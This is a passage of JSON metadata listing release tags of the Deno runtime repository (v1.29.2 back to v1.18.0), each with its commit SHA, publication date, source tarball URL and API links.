ml_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v